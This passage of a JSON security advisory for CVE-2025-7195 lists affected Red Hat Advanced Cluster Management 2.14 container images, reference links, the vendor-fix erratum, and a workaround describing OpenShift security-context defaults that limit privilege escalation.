"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-7195"
},
{
"category": "external",
"summary": "RHBZ#2376300",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376300"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-7195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-7195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7195"
}
],
"release_date": "2025-08-07T18:59:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "In Red Hat OpenShift Container Platform, the following default configurations reduce the impact of this vulnerability.\n\nSecurity Context Constraints (SCCs): The default SCC, Restricted-v2, applies several crucial security settings to containers. \n\nCapabilities: drop: ALL removes all Linux capabilities, including SETUID and SETGID. This prevents a process from changing its user or group ID, a common step in privilege escalation attacks. The SETUID and SETGID capabilities can also be dropped explicitly if other capabilities are still required.\n\nallowPrivilegeEscalation: false ensures that a process cannot gain more privileges than its parent process. This blocks attempts by a compromised container process to grant itself additional capabilities.\n\nSELinux Mandatory Access Control (MAC): Pods are required to run with a pre-allocated Multi-Category Security (MCS) label. This SELinux feature provides a strong layer of isolation between containers and from the host system. A properly configured SELinux policy can prevent a container escape, even if an attacker gains elevated permissions within the container itself.\n\nFilesystem Hardening: While not a default setting, a common security practice is to set readOnlyRootFilesystem: true in a container\u0027s security context. In this specific scenario, this configuration would prevent an attacker from modifying critical files like /etc/passwd, even if they managed to gain file-level write permissions.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
